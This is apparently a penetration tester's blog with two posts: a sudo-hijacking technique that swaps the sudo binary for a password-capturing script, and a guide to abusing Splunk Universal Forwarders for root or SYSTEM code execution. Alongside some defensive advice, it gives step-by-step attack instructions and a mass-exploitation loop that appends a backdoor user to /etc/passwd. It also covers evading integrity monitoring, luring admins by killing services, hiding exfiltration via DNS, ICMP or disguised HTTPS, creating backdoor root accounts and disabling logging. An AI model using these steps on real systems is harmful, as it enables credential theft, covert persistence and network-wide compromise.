Eapolsniper's Blog
01000010 01100101 00100000 01000101 01111000 01100011 01100101 01101100 01101100 01100101 01101110 01110100 00100000 01010100 01101111 00100000 01000101 01100001 01100011 01101000 00100000 01001111 01110100 01101000 01100101 01110010 00000000 00000000 00000000 00000000

Sudo Hijacking

History

Back in the early 2000’s, when us poor hackers didn’t have GPU’s to crack with, we had to get creative to acquire plain text passwords. A common technique, at least in my group of friends, was Sudo Hijacking. Sudo Hijacking is where you move the Sudo binary file, and replace it with a script which mimic’s Sudo, capturing the user’s plain text password for the attacker while relaying the password to the legitimate Sudo binary file for user access.

Present Day

I was having a discussion last week with someone and mentioned Sudo Hijacking and that you can intercept the password and provide a user access to ‘sudo su -‘ without the user noticing the change. The person I was speaking denied this is possible, and a Nerd Off began. I had my old code, last used around 2009, and gave it a try but found Sudo had made updates which broke the old tried and true methods. It appears there’s some level of basic commands filtering to prevent exploitation of Sudo in this manner. I decided to see if I could get a working Proof of Concept again and ended up succeeding. I’m fairly certain I could do it better, but all I’m attempting to show is a concept, the risk, and how to use and prevent these types of attacks. I did some googling and asking around and it appears this technique is not common anymore in the pentest/red team world and as such I felt it was worth writing about.

Hashed Passwords - Problems And Solutions

One thing you will note, is to do this you must have Root access to move the Sudo file. Having Root access is likely to make many people think this is not a vulnerability, since having root access gets you full control to the entire system, but nobody runs a single computer anymore, and as such we’re going to look beyond the single host and see this vulnerability where it relates to a computer network. In fact, I notified the creator of Sudo and they stated they do not feel this is a vulnerability, and provided a number of sound reasons, and I agree so long as we’re only thinking of a single system. As an attacker you will often find a vulnerability to compromise a host as root, and that’s awesome, but how do you move from that single host to other hosts? Grabbing /etc/shadow is the most likely method, but with the usage of SHA-512 type 6 ($6$) hashes in combination with password managers to store long random passwords, cracking passwords has gotten to be a lot more difficult. Most users use either the same password across most Linux systems for ease of access, or they use centralized authentication such as OpenLDAP or Active Directory. This means if we can get the plain text password on the host we’ve compromised, we can use the password to pivot to other systems, and since many administrators use their Domain Administrators account as their everyday admin account in less security conscious companies, this could lead to Domain compromise. Sudo Hijacking becomes one of a number of solutions which can be used to capture the administrator’s password and gain lateral movement.

Video

Execution Steps

Download the InitialPoC script from my repository

  1. copy /usr/bin/sudo to /usr/bin/zsudo
  2. rm /usr/bin/sudo
  3. cp newsudo to /usr/bin/sudo
  4. chmod 4755 /usr/bin/sudo
  5. chmod 4755 /usr/bin/zsudo
  6. Start ‘python -m SimpleHTTPServer 80’ on attacker machine
  7. Wait for a user to sudo su - (note, this is the command I chose to test with, but script could easily be modified for any sudo command)

Defense

We’re going to skip to Defense and then back to Offense. Bear with me, I have a reason.

The primary method of defense for this is to use a File Integrity Monitoring (FIM) solution, which will identify any changes to files on a system. Important controls for FIM is detected file changes must be logged off system, FIM should notify upon start/stop, and FIM should send an ignored beacon back occasionally to notify the FIM server if the agent has died or been tampered with. This control doesn’t even cost money! OSSEC is a free and reliable tool for this. If you want something that is more of a finished product with better reporting, I’ve worked with Tripwire before and it did an excellent job. Now for the hard part, you can’t just log file changes, you have to actually notice that they occurred. You should have a change management system and your FIM should automatically create a ticket and assign it to the system administrator of the system, so they can review any file changes on the system. If an administrator seems a change to a system file, and they haven’t run updates or anything similar, they should notify the incident response team.

In addition to this, I recommend installing an antivirus/anti-rootkit system on the host. On many engagements I exploit Linux hosts more than Windows host, and I have run into 2-3 customers total that used FIM on Linux, and none that use antivirus. This makes moving around and trying different privilege escalation methods very safe for for the attacker.

I’m a fan of using an antivirus system which includes FIM functions, using Antivirus for system FIM, but then install OSSEC to monitor the antivirus files to ensure nobody tampers with the primary AV/FIM. Disabling antivirus is trivial in most cases and often goes unnoticed. This will be another blog post in the near future.

As you would with any malware, monitor suspicious outbound network connections, especially from servers. Linux systems are a lot quieter than Windows systems, very few agents query for updates or do any sort of outbound calls. Monitoring for normal network connections over a few weeks to a month and marking all URL’s/IP’s as known, and anything new after that suspicious is a fast way to detect compromised systems. Update your known hosts list if any new IP’s show up and you determine they are legitimate.

Hiding Installation

So, let’s assume you compromise a host and haven’t left any tracks yet. You want to do Sudo Hijacking but they have File Integrity Monitoring enabled. How do you get around this? Your best best is to write a script and execute it, monitoring bash-history files to see if/when updates are applied to the system. If updates are applied then have the script automatically reconfigure the Sudo environment. When updates apply, administrators often just see hundreds of file changes and mark all of them as legitimate since they know they installed updates that evening. Ideally you won’t save the setup script to disk, instead write the script into a bash 1 liner and run on the command line in the background. If for some reason you must run your script from disk, place it in tmp as an innocent name like page.tmp and once it has executed and is running in memory, delete the local file.

Speeding Up Success

Before I say anything about this, remember to get permission from your company contact to stop services, as this will likely cause a service outage. On some systems this may be acceptable and on others it may not be.

Administrators are busy, and may not login on the schedule which you would prefer. The longer your on systems, the more likely you’ll be detected. As such in certain circumstances it may be advantageous to speed up the admin logging in. If the server is running a web service, you could try stopping the service. An administrator is likely to login to try to figure out why the service has died, and to restart it they will need administrative access. The same can be done for any service running aside from SSH which they will need to login. Don’t do anything else on a host aside from copy off /etc/shadow incase this all fails. You don’t want artifacts lying around to make the administrator suspicious. They will already be suspicious of why a process that usually runs without issue suddenly died.

Hiding Exfiltration

Let’s talk about the largest problem with my Proof of Concept. The script is sending a plain text username and password over unencrypted HTTP. Internally there’s a good chance this won’t get caught by most organizations, but if your doing this attack over the internet, not only is is likely to be caught by defensive systems, but this would expose your customer’s password to every device between them and your attack host. This is not good. As such I recommend setting up an Apache server with HTTPS to act as your collector. Make sure to use a legitimate certificate, Lets Encrypt is free!

So, now that we’re not causing a breach, lets look at how to get the Blue Team to leave us alone. Your script is not going to generate very many outbound connections, which is excellent, so you just need to make the traffic look halfway innocent and it should slide by. I recommend you make a POST request to your attacker server and make it look like an established session looking for an update, where the username:password is encrypted with a pre-shared key using openssl that you know and place the encrypted blob in a session: header so it looks like a valid session cookie for a website. Alternately you can make it look like a Basic authentication connection, but this can easily be decoded and you run the risk of the Blue Team asking the administrator what they tried logging into on the internet from a Linux server with their internal credentials. I know I'd be asking if I were them.

There’s some alternate exfiltration methods out there that take a little more setup. The upside of being a bad guy is that finding anyone doing egress filtering is practically unheard of, still, in 2020. Any Blue Teams reading this, please make our jobs harder.

  1. You can exfiltrate out using ICMP, where ICMP can be padded with legitimate data and be reassembled on the other side. Again, your only sending a small amount of data so this is likely to go unnoticed. If you encrypt the data first it’s going to look so garbled that it should pass as just random garbage data, though re-assembly could be a problem if you lose a packet so you may want to send the same thing 2-3 times to ensure delivery.
  2. DNS Exfiltration. This is a common way of exfiltrating everything nowadays, since it’s one of the most common ports to be allowed outbound on locked down networks.
  3. Batching username/passwords and sending them daily. If this happens to be a super busy host for sudo, maybe a developer test environment, then batching and sending may be smarter than sending each set immediately upon login. I’d use this with care, since I personally would rather have a password and risk getting caught, then have no password and still risk getting caught.

Alternate Attack Method

After I wrote my PoC I did some googling and found a number of people doing a similar attack but they modify a user’s .bashrc file to switch Sudo for just that user. This is an interesting Sudo Hijacking method, though I’d personally prefer to switch the executable for two reasons 1) This will only work for individual users, unless you also poison the bashrc skeleton file, but that has a higher chance of being noticed and 2) People actually look at their .bashrc files more often than people think, so it is likely to be noticed over time. This could work for a very short engagement, but I feel it has a higher chance of being caught long term. On the upside, while .bashrc files come set with RW-R-R permissions, users have a habit of screwing up permissions to their own files and leaving them so there’s a chance of finding files that are writeable and could allow you to escalate privilege instead of just capture plain text passwords. This also could come in very handy with NFS shares which expose user’s home directories. I’ll cover exploiting this with NFS in a future article.

https://null-byte.wonderhowto.com/how-to/steal-ubuntu-macos-sudo-passwords-without-any-cracking-0194190/

Abusing Splunk Forwarders For Shells and Persistence

Description:

The Splunk Universal Forwarder Agent (UF) allows authenticated remote users to send single commands or scripts to the agents through the Splunk API. The UF agent doesn’t validate connections coming are coming from a valid Splunk Enterprise server, nor does the UF agent validate the code is signed or otherwise proven to be from the Splunk Enterprise server. This allows an attacker who gains access to the UF agent password to run arbitrary code on the server as SYSTEM or root, depending on the operating system.

This attack is being used by Penetration Testers and is likely being actively exploited in the wild by malicious attackers. Gaining the password could lead to the compromise of hundreds of system in a customer environment.

Splunk UF passwords are relatively easy to acquire, see the secion Common Password Locations for details.

Context:

Splunk is a data aggregation and search tool often used as a Security Information and Event Monitoring (SIEM) system. Splunk Enterprise Server is a web application which runs on a server, with agents, called Universal Forwarders, which are installed on every system in the network. Splunk provides agent binaries for Windows, Linux, Mac, and Unix. Many organizations use Syslog to send data to Splunk instead of installing an agent on Linux/Unix hosts but agent installation is becomming increasingly popular.

Universal Forwarder is accessible on each host at https://host:8089. Accessing any of the protected API calls, such as /service/ pops up a Basic authentication box. The username is always admin, and the password default used to be changeme until 2016 when Splunk required any new installations to set a password of 8 characters or higher. As you will note in my demo, complexity is not a requirement as my agent password is 12345678. A remote attacker can brute force the password without lockout, which is a necessity of a log host, since if the account locked out then logs would no longer be sent to the Splunk server and an attacker could use this to hide their attacks. The following screenshot shows the Universal Forwarder agent, this initial page is accessible without authentication and can be used to enumerate hosts running Splunk Universal Forwarder.

0

Splunk documentaiton shows using the same Universal Forwarding password for all agents, I don’t remember for sure if this is a requirement or if individual passwords can be set for each agent, but based on documentaiton and memory from when I was a Splunk admin, I believe all agents must use the same password. This means if the password is found or cracked on one system, it is likely to work on all Splunk UF hosts. This has been my personal experience, allowing compromise of hundreds of hosts quickly.

Common Password Locations

I often find the Splunk Universal Forwarding agent plain text password in the following locations on networks:

  1. Active Directory Sysvol/domain.com/Scripts directory. Administrators store the executible and the password together for efficient agent installation.
  2. Network file shares hosting IT installation files
  3. Wiki or other build note repositories on internal network

The password can also be accessed in hashed form in Program Files\Splunk\etc\passwd on Windows hosts, and in /opt/Splunk/etc/passwd on Linux and Unix hosts. An attacker can attempt to crack the password using Hashcat, or rent a cloud cracking environment to increase liklihood of cracking the hash. The password is a strong SHA-256 hash and as such a strong, random password is unlikely to be cracked.

Impact:

An attacker with a Splunk Universal Forward Agent password can fully compromise all Splunk hosts in the network and gain SYSTEM or root level permissions on each host. I have successfully used the Splunk agent on Windows, Linux, and Solaris Unix hosts. This vulnerability could allow system credentials to be dumped, sensitive data to be exfiltrated, or ransomware to be installed. This vulnerability is fast, easy to use, and reliable.

Since Splunk handles logs, an attacker could reconfigure the Universal Forwarder on the first command run to change the Forwarder location, disabling logging to the Splunk SIEM. This would drastically reduce the chances of being caught by the client Blue Team.

Splunk Universal Forwarder is often seen installed on Domain Controllers for log collection, which could easily allow an attacker to extract the NTDS file, disable antivirus for further exploitation, and/or modify the domain.

Finally, the Universal Forwarding Agent does not require a license, and can be configured with a password stand alone. As such an attacker can install Universal Forwarder as a backdoor persistence mechanism on hosts, since it is a legitimate application which customers, even those who do not use Splunk, are not likely to remove.

Evidence:

To show an exploitation example I set up a test environment using the latest Splunk version for both the Enterprise Server and the Universal Forwarding agent. A total of 10 images have been attached to this report, showing the following:

  1. Requesting the /etc/passwd file through PySplunkWhisper2 1
  2. Receiving the /etc/passwd file on the attacker system through Netcat 2
  3. Requesting the /etc/shadow file through PySplunkWhisper2 3
  4. Receiving the /etc/shadow file on the attacker system through Netcat 4
  5. Adding the user attacker007 to the /etc/passwd file 5
  6. Adding the user attacker007 to the /etc/shadow file 6
  7. Receiving the new /etc/shadow file showing attacker007 is successfully added 7
  8. Confirming SSH access to the victim using the attacker007 account 8
  9. Adding a backdoor root account with username root007, with the uid/gid set to 0 9
  10. Confirming SSH access using attacker007, and then escalating to root using root007 10

At this point I have persistent access to the host both through Splunk and through the two user accounts created, one of which provides root. I can disable remote logging to cover my tracks and continue attacking the system and network using this host.

Scripting PySplunkWhisperer2 is very easy and effective.

  1. Create a file with IP’s of hosts you want to exploit, example name ip.txt
  2. Run the following:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Host information:

Splunk Enterprise Server: 192.168.42.114
Splunk Forwarder Agent Victim: 192.168.42.98
Attacker:192.168.42.51

Splunk Enterprise version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)
Universal Forwarder version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)

Remediation Recommendation’s for Splunk, Inc:

I recommend implementing all of the following solutions to provide defense in depth:

  1. Ideally, the Universal Forwarder agent would not have a port open at all, but rather would poll the Splunk server at regular intervals for instructions.
  2. Enable TLS mutual authentication between the clients and server, using individual keys for each client. This would provide very high bi-directional security between all Splunk services. TLS mutual authentication is being heavily implemented in agents and IoT devices, this is the future of trusted device client to server communication.
  3. Send all code, single line or script files, in a compressed file which is encrypted and signed by the Splunk server. This does not protect the agent data sent through the API, but protects against malicious Remote Code Execution from a 3rd party.

Remediation Recommendation’s for Splunk customers:

  1. Ensure a very strong password is set for Splunk agents. I recommend at least a 15-character random password, but since these passwords are never typed this could be set to a very large password such as 50 characters.
  2. Configure host based firewalls to only allow connections to port 8089/TCP (Universal Forwarder Agent’s port) from the Splunk server.

Recommendations for Red Team:

  1. Download a copy of Splunk Universal Forwarder for each operating system, as it is a great light weight signed implant. Good to keep a copy incase Splunk actually fixes this.

Exploits/Blogs from other researchers

Usable public exploits:

  • https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
  • https://www.exploit-db.com/exploits/46238
  • https://www.exploit-db.com/exploits/46487

Related blog posts:

  • https://clement.notin.org/blog/2019/02/25/Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2/
  • https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2
  • https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool

** Note: ** This issue is a serious issue with Splunk systems and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implimentaion of this is dangerous. I attempted to submit this bug via Splunk’s bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions implement the Bug Crowd/Splunk disclosure policy which states no details of the vulnerability may be discussed publically ever without Splunk’s permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this since I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses.